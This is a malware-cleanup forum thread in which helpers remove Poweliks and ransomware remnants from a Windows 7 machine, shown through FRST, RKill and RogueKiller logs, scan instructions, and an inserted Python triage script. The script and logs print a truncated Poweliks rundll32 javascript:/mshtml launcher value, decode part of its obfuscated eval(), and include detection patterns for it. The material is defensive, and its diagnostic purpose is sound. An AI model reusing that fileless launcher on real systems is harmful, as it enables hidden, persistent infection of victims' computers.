C:\Users\INSTALL_TOR.URL => Moved successfully.
C:\INSTALL_TOR.URL => Moved successfully.
C:\Users\scalac\AppData\Roaming\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\scalac\AppData\Local\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\scalac\AppData\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\scalac\AppData\Roaming\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\scalac\AppData\Local\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\scalac\AppData\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\scalac\AppData\Roaming\INSTALL_TOR.URL => Moved successfully.
C:\Users\scalac\AppData\Local\INSTALL_TOR.URL => Moved successfully.
C:\Users\scalac\AppData\INSTALL_TOR.URL => Moved successfully.
C:\Users\alvayerog\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\alvayerog\AppData\Roaming\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\alvayerog\AppData\Local\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\alvayerog\AppData\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\alvayerog\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\alvayerog\AppData\Roaming\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\alvayerog\AppData\Local\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\alvayerog\AppData\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\alvayerog\INSTALL_TOR.URL => Moved successfully.
C:\Users\alvayerog\AppData\Roaming\INSTALL_TOR.URL => Moved successfully.
C:\Users\alvayerog\AppData\Local\INSTALL_TOR.URL => Moved successfully.
C:\Users\alvayerog\AppData\INSTALL_TOR.URL => Moved successfully.
C:\Users\Administrator\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Administrator\AppData\Local\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Administrator\AppData\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\ProgramData\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Administrator\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Administrator\AppData\Local\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Administrator\AppData\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\ProgramData\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Administrator\INSTALL_TOR.URL => Moved successfully.
C:\Users\Administrator\AppData\Local\INSTALL_TOR.URL => Moved successfully.
C:\Users\Administrator\AppData\INSTALL_TOR.URL => Moved successfully.
C:\ProgramData\INSTALL_TOR.URL => Moved successfully.
C:\ProgramData\@system.temp => Moved successfully.
C:\ProgramData\@system3.att => Moved successfully.
C:\Users\scalac\AppData\Roaming\FrameworkUpdate7 => Moved successfully.
C:\ProgramData\wrnhoah.tmp => Moved successfully.
C:\ProgramData\@system.att => Moved successfully.
C:\ProgramData\@system2.att => Moved successfully.
C:\Users\scalac\AppData\Roaming\麽鎒駓覜 => Moved successfully.
"HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\42665744.sys" => Key deleted successfully.
"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\42665744.sys" => Key deleted successfully.
EmptyTemp: => Removed 2.5 GB temporary data.


The system needed a reboot.

==== End of Fixlog ====
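
The registry lines FRST flagged above, run through a small triage script. This is an added example written for this thread, not FRST's or Farbar's code: it parses FRST-style registry lines, flags the Poweliks LocalServer32 launcher along with the per-user Winlogon Shell and IE policy entries, and undoes the one-character code shift Poweliks applied to its eval() argument (that shift is this example's assumption, confirmed by the visible fragment decoding to readable JScript). Sample lines are copied from the fixlog, with the eval() string cut where the log cut it, plus one constructed benign Run entry.

```python
"""Triage FRST registry lines for Poweliks-style persistence (added example)."""
import re
from dataclasses import dataclass

# Constructed sample input: three registry lines copied from the FRST fixlog
# above, plus one constructed benign Run entry to show a non-match. The
# eval() argument stops exactly where the log truncated it.
SAMPLE_LINES = [
    r"HKU\S-1-5-19\...\Winlogon: [Shell] C:\Windows\Explorer.exe [2616320 2011-02-25] (Microsoft Corporation) <==== ATTENTION",
    r'HKU\S-1-5-21-19809612-450918713-1538882281-38475\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds',
    r"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION",
    r"HKLM\...\Run: [ExampleUpdater] C:\Program Files\Example\updater.exe (Example Vendor)",
]

FRST_MARKER = re.compile(r"\s*<=+\s.*$")       # FRST's trailing "<==== ATTENTION"
EVAL_ARG = re.compile(r'eval\("([^"]*)')         # first argument of eval("...")
RUNDLL32_JS = re.compile(r"rundll32(?:\.exe)?\s+javascript:", re.IGNORECASE)
MSHTML_HTA = re.compile(r"mshtml\s*,\s*RunHTMLApplication", re.IGNORECASE)


@dataclass
class Finding:
    severity: str          # "high", "medium" or "low"
    key: str               # registry key as FRST printed it
    reason: str
    decoded: str = ""      # de-obfuscated eval() argument, when present


def split_frst_line(line: str):
    """Return (registry key, value) with FRST's trailing marker removed."""
    line = FRST_MARKER.sub("", line.strip())
    key, sep, value = line.partition(": ")
    return key, (value if sep else "")


def shift_decode(text: str, delta: int = 1) -> str:
    """Undo a per-character code shift. Poweliks stored its JScript with every
    character code incremented by one; subtracting one recovers the source
    (assumption of this example, confirmed by the fragment decoding to text)."""
    return "".join(chr(ord(c) - delta) for c in text)


def decode_eval_fragment(value: str) -> str:
    """Pull the quoted eval() argument out of a LocalServer32 value and decode it."""
    m = EVAL_ARG.search(value)
    return shift_decode(m.group(1)) if m else ""


def triage_line(line: str):
    """Classify one FRST registry line; returns a Finding or None."""
    key, value = split_frst_line(line)
    key_l = key.lower()
    # Poweliks: a COM class whose LocalServer32 is rundll32 running a javascript:
    # URL through mshtml's RunHTMLApplication, so no file on disk is needed.
    if key_l.endswith("localserver32") and RUNDLL32_JS.search(value) and MSHTML_HTA.search(value):
        return Finding("high", key,
                       "LocalServer32 runs rundll32 javascript: via mshtml RunHTMLApplication "
                       "(Poweliks-style fileless COM persistence)",
                       decode_eval_fragment(value))
    # Per-user Winlogon Shell values do not exist on a default install; FRST
    # flags them even when they point at the real Explorer.exe.
    if key_l.startswith("hku\\") and "winlogon" in key_l and value.startswith("[Shell]"):
        return Finding("medium", key, "per-user Winlogon Shell override")
    # FRST flags policy restrictions under Policies\Microsoft\Internet Explorer;
    # confirm they are intended before keeping them.
    if "policies\\microsoft\\internet explorer" in key_l and "policy restriction" in value.lower():
        return Finding("low", key, "Internet Explorer policy restriction present")
    return None


def triage(lines):
    """Run triage_line over a list of FRST lines and keep the hits."""
    return [f for f in map(triage_line, lines) if f is not None]


if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f"[{f.severity:6}] {f.key}\n         {f.reason}")
        if f.decoded:
            print(f"         decoded eval(): {f.decoded}")
```

The decoded fragment of the page's own Poweliks value reads `document.write('<script language=jscr`, which is the start of the script Poweliks injects into the mshtml host; the remaining 239 characters are not in the log, so the example stops there.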



#10 B-boy/StyLe/

    Bleepin' Freestyler

  • Malware Response Team
  • 8,307 posts
  • Gender:Male
  • Location:Bulgaria

Posted 03 November 2014 - 06:41 PM

Hi,

The infection seems to be removed, but if you don't mind, I want to make sure there is nothing lurking on the system, so just in case I want you to go through these steps:

Most of them should take no more than 5 minutes each (but the time they take to complete can vary depending on the size of your hard drive and the speed of your computer).

STEP 1

  • Please download RKill by Grinler from the link below and save it to your desktop.
    Rkill
  • Before we begin, you should disable any anti-malware software you have installed so it does not interfere with RKill running, as some anti-malware software detects RKill as malicious. Please refer to this page if you are not sure how.
  • Double-click on Rkill on your desktop to run it. (If you are using Windows Vista, please right-click on it and select Run As Administrator.)
  • A black screen will appear and then disappear. Please do not worry, that is normal. This means that the tool has been successfully executed.
  • If nothing happens or if the tool does not run, please let me know in your next reply.
  • A log pops up at the end of the run. This log file is located at C:\rkill.log.
  • Please post the log in your next reply.

STEP 2

  • Please download RogueKillerX64.exe and save it to the desktop.
  • Close all windows and browsers.
  • Right-click the program and select 'Run as Administrator'.
  • Wait for the prescan to complete and then press the Scan button.
  • When done, press the Report button.
  • Please copy and paste the results in your next reply.

STEP 3

Please download the latest version of TDSSKiller from here and save it to your Desktop.

  • Double-click on TDSSKiller.exe to run the application, then click on Change parameters.
  • Put a checkmark beside loaded modules.
  • A reboot will be needed to apply the changes. Do it.
  • TDSSKiller will launch automatically after the reboot. Also, your computer may seem very slow and unusable. This is normal. Give it enough time to load your background programs.
  • Then click on Change parameters in TDSSKiller.
  • Check all boxes, then click OK.
  • Click the Start Scan button.
  • The scan should take no longer than 2 minutes.
  • If a suspicious object is detected, the default action will be Skip; click on Continue.
  • If malicious objects are found, they will show in the Scan results - Select action for found objects and offer three options.
    Ensure Cure (default) is selected, then click Continue > Reboot now to finish the cleaning process.

    Note: If Cure is not available, please choose Skip instead; do not choose Delete unless instructed.
  • A report will be created in your root directory (usually the C:\ folder) in the form "TDSSKiller.[Version]_[Date]_[Time]_log.txt". Please copy and paste the results at pastebin.com and post the link to the log in your next reply.

STEP 4

Please download Malwarebytes Anti-Malware 2.0.3.1025 Final to your desktop.

  • Double-click mbam-setup-2.0.3.1025.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish.
  • On the Settings tab > Detection and Protection subtab, Detection Options, tick the box 'Scan for rootkits'.
  • Click on the Scan tab, then click on Scan Now >> . If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • With some infections, you may see this message box.
    • 'Could not load DDA driver'
  • Click 'Yes' to this message, to allow the driver to load after a restart.
  • Allow the computer to restart. Continue with the rest of these instructions.
  • When the scan is complete, click Apply Actions.
  • Wait for the prompt to restart the computer to appear, then click on Yes.
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'
  • Paste the contents of the clipboard into your reply.

 

 

STEP 5

1. Please download HitmanPro.

  • For 32-bit Operating System
  • This is the mirror
  • For 64-bit Operating System
  • This is the mirror

2. Launch the program by double-clicking on the HitmanPro icon. (Windows Vista/7 users: right-click on the HitmanPro icon and select Run as administrator.)

Note: If the program won't run, open it while holding down the left CTRL key until the program is loaded.

3. Click on the Next button. You must agree to the terms of the EULA (if asked).

4. Check the box beside "No, I only want to perform a one-time scan to check this computer".

5. Click on the Next button.

6. The program will start to scan the computer. The scan will typically take no more than 2-3 minutes.

7. When the scan is done, click on the drop-down menu of the found entries (if any) and choose Apply to all => Ignore <= IMPORTANT!!!

8. Click on the Next button.

9. Click on the "Save Log" button.

10. Save that file to your desktop and post the content of that file in your next reply.

Note: If there isn't a drop-down menu when the scan is done, please don't delete anything and close HitmanPro.

Navigate to C:\ProgramData\HitmanPro\Logs, open the report and copy and paste it into your next reply.

STEP 6

Download Security Check by screen317 from here.

  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.

 

and then if there aren't any issues left I'll give you my final recommendations. :)

 

 

Regards,

Georgi




#11 Shate'

  • Topic Starter
  • Members
  • 72 posts

Posted 04 November 2014 - 08:28 AM

Wow!  No crazy running processes and 97% memory hogging!

Thank you Georgi!

I will tend to those programs today and post.

 

Would you tell me what the FRST program actually did to remove this insidious thing please?

 

Also, as you probably saw, my co-worker's files have been ransomed.  I am going to go to the FoxIT Scanner site to see if the free key unlocks them, after I do the other scanning.  Is that something that you have used before?

 

Thank you so much again!



#12 Shate'

  • Topic Starter
  • Members
  • 72 posts

Posted 04 November 2014 - 09:19 AM

Rkill 2.6.8 by Lawrence Abrams (Grinler)
http://www.bleepingcomputer.com/
Copyright 2008-2014 BleepingComputer.com
More Information about Rkill can be found at this link:
 http://www.bleepingcomputer.com/forums/topic308364.html

Program started at: 11/04/2014 09:11:01 AM in x86 mode.
Windows Version: Windows 7 Professional Service Pack 1

Checking for Windows services to stop:

 * No malware services found to stop.

Checking for processes to terminate:

 * No malware processes found to kill.

Checking Registry for malware related settings:

 * No issues found in the Registry.

Resetting .EXE, .COM, & .BAT associations in the Windows Registry.

Performing miscellaneous checks:

 * System Restore Disabled

   [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
   "DisableSR" = dword:00000001

 * Windows Defender Disabled

   [HKLM\SOFTWARE\Microsoft\Windows Defender]
   "DisableAntiSpyware" = dword:00000001

 * Windows Firewall Disabled

   [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
   "EnableFirewall" = dword:00000000

Checking Windows Service Integrity:

 * Windows Defender (WinDefend) is not Running.
   Startup Type set to: Disabled

 * Security Center (wscsvc) is not Running.
   Startup Type set to: Disabled

 * Windows Update (wuauserv) is not Running.
   Startup Type set to: Disabled

Searching for Missing Digital Signatures:

 * No issues found.

Checking HOSTS File:

 * HOSTS file entries found:

  127.0.0.1       localhost

Program finished at: 11/04/2014 09:12:24 AM
Execution time: 0 hours(s), 1 minute(s), and 23 seconds(s)
 



#13 Shate'

  • Topic Starter
  • Members
  • 72 posts

Posted 04 November 2014 - 10:26 AM

RogueKiller V10.0.4.0 [Oct 29 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 32 bits version
Started in : Normal mode
User : ScalaC [Administrator]
Mode : Scan -- Date : 11/04/2014  09:36:23

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 13 ¤¤¤
[PUM.Dns] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{424147DC-30E0-4EF1-84FF-DF9A5EF85995} | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{AD67ED7A-71F7-4E27-9F5E-A494BB679476} | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{424147DC-30E0-4EF1-84FF-DF9A5EF85995} | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{AD67ED7A-71F7-4E27-9F5E-A494BB679476} | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{424147DC-30E0-4EF1-84FF-DF9A5EF85995} | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{AD67ED7A-71F7-4E27-9F5E-A494BB679476} | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Desktop] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore | DisableSR : 1  -> Found
[PUM.StartMenu] HKEY_USERS\S-1-5-21-19809612-450918713-1538882281-38475\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.DesktopIcons] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 1 ¤¤¤
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1       localhost

¤¤¤ Antirootkit : 44 (Driver: Loaded) ¤¤¤
[SSDT:Addr(Hook.SSDT)] NtAlertResumeThread[13] : Unknown @ 0x875b5670
[SSDT:Addr(Hook.SSDT)] NtAlertThread[14] : Unknown @ 0x875bac30
[SSDT:Addr(Hook.SSDT)] NtAllocateVirtualMemory[19] : Unknown @ 0x875b32e0
[SSDT:Addr(Hook.SSDT)] NtAlpcConnectPort[22] : Unknown @ 0x86e89a68
[SSDT:Addr(Hook.SSDT)] NtAssignProcessToJobObject[43] : Unknown @ 0x875ba550
[SSDT:Addr(Hook.SSDT)] NtCreateMutant[74] : Unknown @ 0x875b5498
[SSDT:Addr(Hook.SSDT)] NtCreateSymbolicLinkObject[86] : Unknown @ 0x875ba348
[SSDT:Addr(Hook.SSDT)] NtCreateThread[87] : Unknown @ 0x875b1b80
[SSDT:Addr(Hook.SSDT)] NtCreateThreadEx[88] : Unknown @ 0x875ba3f0
[SSDT:Addr(Hook.SSDT)] NtDebugActiveProcess[96] : Unknown @ 0x875ba5e8
[SSDT:Addr(Hook.SSDT)] NtDuplicateObject[111] : Unknown @ 0x875b33a8
[SSDT:Addr(Hook.SSDT)] NtFreeVirtualMemory[131] : Unknown @ 0x875b3190
[SSDT:Addr(Hook.SSDT)] NtImpersonateAnonymousToken[145] : Unknown @ 0x875b5540
[SSDT:Addr(Hook.SSDT)] NtImpersonateThread[147] : Unknown @ 0x875b55d8
[SSDT:Addr(Hook.SSDT)] NtLoadDriver[155] : Unknown @ 0x86e9caa0
[SSDT:Addr(Hook.SSDT)] NtMapViewOfSection[168] : Unknown @ 0x875b30d8
[SSDT:Addr(Hook.SSDT)] NtOpenEvent[177] : Unknown @ 0x875b5400
[SSDT:Addr(Hook.SSDT)] NtOpenProcess[190] : Unknown @ 0x875b6008
[SSDT:Addr(Hook.SSDT)] NtOpenProcessToken[191] : Unknown @ 0x86f1cbd0
[SSDT:Addr(Hook.SSDT)] NtOpenSection[194] : Unknown @ 0x875b52d0
[SSDT:Addr(Hook.SSDT)] NtOpenThread[198] : Unknown @ 0x875b6088
[SSDT:Addr(Hook.SSDT)] NtProtectVirtualMemory[215] : Unknown @ 0x875ba4a8
[SSDT:Addr(Hook.SSDT)] NtQueueApcThread[269] : Unknown @ 0x875ba2a0
[SSDT:Addr(Hook.SSDT)] NtQueueApcThreadEx[270] : Unknown @ 0x875ba1f8
[SSDT:Addr(Hook.SSDT)] NtResumeThread[304] : Unknown @ 0x875bacc8
[SSDT:Addr(Hook.SSDT)] NtSetContextThread[316] : Unknown @ 0x875bae90
[SSDT:Addr(Hook.SSDT)] NtSetInformationProcess[333] : Unknown @ 0x875baf28
[SSDT:Addr(Hook.SSDT)] NtSetSystemInformation[350] : Unknown @ 0x875ba680
[SSDT:Addr(Hook.SSDT)] NtSuspendProcess[366] : Unknown @ 0x875b5368
[SSDT:Addr(Hook.SSDT)] NtSuspendThread[367] : Unknown @ 0x875bad60
[SSDT:Addr(Hook.SSDT)] NtTerminateProcess[370] : Unknown @ 0x85713ae8
[SSDT:Addr(Hook.SSDT)] NtTerminateThread[371] : Unknown @ 0x875badf8
[SSDT:Addr(Hook.SSDT)] NtUnmapViewOfSection[385] : Unknown @ 0x875bafd0
[SSDT:Addr(Hook.SSDT)] NtWriteVirtualMemory[399] : Unknown @ 0x875b3238
[ShwSSDT:Addr(Hook.Shadow)] NtUserAttachThreadInput[318] : Unknown @ 0x88650210
[ShwSSDT:Addr(Hook.Shadow)] NtUserGetAsyncKeyState[402] : Unknown @ 0x885dda58
[ShwSSDT:Addr(Hook.Shadow)] NtUserGetKeyboardState[434] : Unknown @ 0x8864f9b8
[ShwSSDT:Addr(Hook.Shadow)] NtUserGetKeyState[436] : Unknown @ 0x886284a0
[ShwSSDT:Addr(Hook.Shadow)] NtUserGetRawInputData[448] : Unknown @ 0x86a13330
[ShwSSDT:Addr(Hook.Shadow)] NtUserMessageCall[490] : Unknown @ 0x86a20f78
[ShwSSDT:Addr(Hook.Shadow)] NtUserPostMessage[508] : Unknown @ 0x86a131e8
[ShwSSDT:Addr(Hook.Shadow)] NtUserPostThreadMessage[509] : Unknown @ 0x86a20fc0
[ShwSSDT:Addr(Hook.Shadow)] NtUserSetWindowsHookEx[585] : Unknown @ 0x86a133f8
[ShwSSDT:Addr(Hook.Shadow)] NtUserSetWinEventHook[588] : Unknown @ 0x886683f0

¤¤¤ Web browsers : 1 ¤¤¤
[PUM.HomePage][FIREFX:Config] izvhwsf0.default : user_pref("browser.startup.homepage", "www.google.com"); -> Found

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD2500BPVT-75JJ5T0 ATA Device +++++
--- User ---
[MBR] f825c7e5cc15d846901fd8e3e869e6f5
[BSP] 36084d14aa184d0d8bb4f81a9b7bf200 : Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 238373 MB
User = LL1 ... OK
User = LL2 ... OK


============================================
RKreport_DEL_10232014_181901.log - RKreport_DEL_10232014_182443.log - RKreport_DEL_10232014_182658.log - RKreport_DEL_10232014_182725.log
RKreport_DEL_10302014_135803.log - RKreport_DEL_10312014_181301.log - RKreport_SCN_10232014_180616.log - RKreport_SCN_10302014_133840.log
RKreport_SCN_10312014_180716.log



#14 Shate'

  • Topic Starter
  • Members
  • 72 posts

Posted 04 November 2014 - 10:29 AM

The Adlice website came up after the scan with the following:

KernelMode rootkits: Part 1, SSDT hooks

This is the first part of this series about Kernel Mode rootkits. I wanted to write about it and demonstrate what some rootkits (e.g. Necurs) do to hide their presence and protect themselves from removal by using SSDT hooks.

I'll first introduce what KernelMode is (as opposed to UserLand), then what the SSDT is, and finally demonstrate how a hook can be made, detected, and removed.

This post is about a classic trick, known for decades. Malware specialists may know this already, so this is mostly an introduction for those willing to learn the theory of rootkits and see a demonstration. Call them beginners if you want.

If you land here from RogueKiller…

…this is because RogueKiller has detected an SSDT hook. Don't panic. Most of the time, they are made by antiviruses to protect your computer.

However, most antivirus drivers are whitelisted in RogueKiller, so either the driver is not known (please verify by typing it into Google; for example, klif.sys = Kaspersky), or the module is real malware (if you didn't find anything on it on Google, or worse, you found bad things), or the module has not been identified (shellcode outside of any module), in which case the module is named "Unknown". In this last case, if nothing else has been found by RogueKiller, just skip it. Some antiviruses can use shellcode to protect their driver too.

Another thing to know is that it's USELESS in most cases to remove a hook, because if you're able to restore it (and you don't get a BSoD restoring it), it will be back at reboot. You have to target the persistence item instead (registry key, patched file, …). In RogueKiller, SSDT hooks are just listed for diagnosis and will not be restored.

 
 



#15 Shate'

  • Topic Starter
  • Members
  • 72 posts

Posted 04 November 2014 - 10:55 AM

I did not do anything with them.  I am awaiting your instruction before I run the next program.





